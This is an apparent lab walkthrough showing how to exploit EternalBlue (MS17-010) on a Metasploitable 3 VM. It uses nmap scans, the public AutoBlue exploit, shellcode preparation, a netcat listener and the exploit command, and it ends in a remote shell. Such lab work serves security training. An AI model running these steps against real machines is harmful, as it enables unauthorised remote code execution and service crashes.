Manual Exploitation of EternalBlue (MS17-010)

This guide provides a manual approach to exploiting the EternalBlue vulnerability (MS17-010), a severe SMB flaw affecting older Windows systems. By following each step, you'll see how to exploit this vulnerability without automated tools, gaining insights into the techniques attackers use to execute remote code on unpatched systems. This hands-on method emphasizes the need for strong security practices and regular patching to prevent similar threats.

Mahran Al-Zyoud
|
23 steps

- **Virtualization Software:** Oracle VirtualBox 7.1.4 - **Host Operating System:** Windows 11 - **Guest Operating Systems:** Kali Linux & Metasploitable 3 (Windows Server 2008) - **Last Updated:** November 2024 - **Created by**: Mahran Al-Zyoud. For any improvements, corrections, or suggestions, please feel free to contact me at [mahran.alzyoud@gmail.com](mailto:mahran.alzyoud@gmail.com). Your feedback is appreciated!

The **EternalBlue (MS17-010)** vulnerability is a critical flaw in the SMB protocol on certain older versions of Windows, including Windows XP and Windows 7. Discovered by the NSA and later leaked, this vulnerability enables remote code execution on unpatched systems by sending a specially crafted packet to a vulnerable SMB server. Exploits targeting EternalBlue have been used in notable attacks, such as WannaCry and NotPetya, demonstrating the severity of leaving systems unpatched. In a manual exploitation of EternalBlue, rather than developing an exploit from scratch, you’re using an existing one created by security researchers. This approach involves adapting and running the exploit against a vulnerable machine by making environment-specific adjustments, such as setting the correct target IP address and configuring the payload options. Manual steps ensure that you understand how the exploit operates and help you practice executing it in a controlled environment. Using an established exploit manually gives you firsthand insight into the techniques attackers may use to compromise unpatched systems. By working through these steps, you can also better appreciate the importance of timely patching and the role of preventative measures in securing vulnerable networks.

In this example, the target machine is **Metasploitable 3** VM. We need to get its IP address. Remember that you have to select the **Administrator** username and put **vagrant** as its password. Run **[[ipconfig]]**

Scan your target by running: **[[sudo nmap -sV -p 445 -O 172.17.2.23]]** **Note1**: I already ran [[sudo nmap -O 172.17.2.23]] to get details about the OS. After that, I searched for potential vulnerabilities on that OS and dug deeper to focus on a vulnerability that is related to the service on port 445. That is why I ran [[sudo nmap -sV -p 445 -O 172.17.2.23]] - **-sV (Service Version Detection)**: This option attempts to detect the versions of services running on open ports. It sends probes to services on those ports to determine their version numbers. - **-O (OS Detection)**: This option attempts to identify the operating system of the target machine based on responses from the network stack and other characteristics. **Note 2**: The **[[-O]]** option can take longer to execute because it involves more sophisticated techniques to determine the OS (such as sending specific probes to infer details about the TCP/IP stack). In some cases, this may slow down the scan, especially if you're scanning many systems or if stealth is important (since -O can make the scan more noticeable). Port **445** is primarily used for **Microsoft Directory Services** and **Microsoft Server Message Block (SMB)** over TCP/IP. It's an essential port for various Windows services and is often associated with **Windows file and printer sharing**, **Active Directory**, and other network services. Port 445 is often targeted by attackers because it provides remote access to systems, especially when SMB vulnerabilities are exploited. Famous attacks, such as **WannaCry** (which exploited the **EternalBlue** vulnerability in SMB) and **NotPetya**, took advantage of open port 445 to spread malware across networks. It's recommended to block port 445 from being publicly exposed to the internet to prevent such attacks, as open SMB ports on internet-facing machines make them highly vulnerable to exploitation.

Execute the command **[[ls -l /usr/share/nmap/scripts | grep smb-]]** to find Nmap scripts related to SMB

Execute the command [[sudo nmap -sV -p 445 -O --script=smb-vuln-ms17-010 172.17.2.23]] to scan the target IP address (172.17.2.23) for the presence of the MS17-010 vulnerability on port 445, using the Nmap SMB vulnerability script to detect if the system is susceptible to EternalBlue exploitation.

We will use the [**AutoBlue**](https://github.com/3ndG4me/AutoBlue-MS17-010) exploit. Access the link from your Kali virtual machine.

Open the [[Terminal]] and run the following commands: [[cd Downloads]] [[git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git]] [[ls -l]]

Run [[cd AutoBlue-MS17-010]] then [[ls -l]]

Run [[pip install -r requirements.txt]] The command **pip install -r requirements.txt** is used in Python environments to install the dependencies listed in a requirements.txt file. Here's what it does: - pip: This is the package installer for Python, used to install libraries and packages from the Python Package Index (PyPI) or other repositories. - install: This tells pip to install the listed packages. - \-r: This flag stands for "requirement." It tells pip to install all the packages listed in a requirements file. - requirements.txt: This is a plain text file that contains a list of Python packages, often with specific versions, that the project requires. Each line of the file typically contains a package name and optionally a version number (e.g., requests==2.25.0).

Rub [[cd shellcode]] then [[ls -l]]

Run the command [[chmod +x shell_prep.sh]] to grant the execute permission to the **shell_prep.sh** file, allowing it to be executed from the terminal or shell. You can now execute the script by running **[[./shell_prep.sh]]**

Answer the subsequent questions as shown below.

Run [[ls -alps]] The command ls -alps lists files and directories in the current directory with additional details, applying multiple options together. Here’s what each option does: - \-a: Shows all files, including hidden ones (those that start with a dot .). - \-l: Provides a detailed (long) listing format, showing information like file permissions, number of links, owner, group, file size, and modification date. - \-p: Appends a slash (/) after directory names, making it easier to distinguish directories from files. - \-s: Displays the file size in blocks next to each item in the list.

Go to the parent directory by running [[cd ..]] then list the contents by running [[ls -alps]]

Open another **Terminal** session and run **[[nc -nvlp]]**

Run [[chmod +x eternalblue_exploit7.py]] This adds execute (x) permission to the file. Adding this permission allows the file to be run as an executable script.

Run **[[python eternalblue_exploit7.py 172.17.2.23 shellcode/sc_x64.bin]]** The command is used to run the **eternalblue_exploit7.py** Python script, targeting the IP address 172.17.2.23 and specifying a payload file **shellcode/sc_x64.bin** - **python**: This runs the Python interpreter, executing the specified Python script. - **eternalblue_exploit7.py**: This is the Python script file, likely crafted to exploit the EternalBlue vulnerability (MS17-010). The script would contain code designed to interact with the vulnerability in SMB (Server Message Block) on the target system. - **172.17.2.23**: This is the IP address of the target machine, where the script will attempt to execute the exploit. - **shellcode/sc_x64.bin**: This specifies a payload file, usually containing shellcode, which defines what the exploit does if successful. The .bin file is a binary file with machine code instructions, often tailored to achieve something specific (like opening a shell or performing another action) on a 64-bit (x64) target system. Note: We chose eternalblue_exploit7.py and not eternalblue_exploit10.py or eternalblue_exploit8.py, because **Windows 7** and **Windows Server 2008 R2** share the same core architecture. Both operating systems are built on the same version of the Windows NT kernel (version 6.1) and have similar underlying codebases.

As shown in the figure above, you may receive error or warning messages or the entire script may not function as planned. **This is normal. Get used to it.**

I kept running the command in an attempt to exploit the target machine, and as a result of that, it crashed, as shown below. I know we didn't intend to pull it out of service, but it happened. Again, get used to it.

You may get several errors while trying to exploit it.

After several attempts, we get to the shell of the target machine and now we can execute whatever command we want.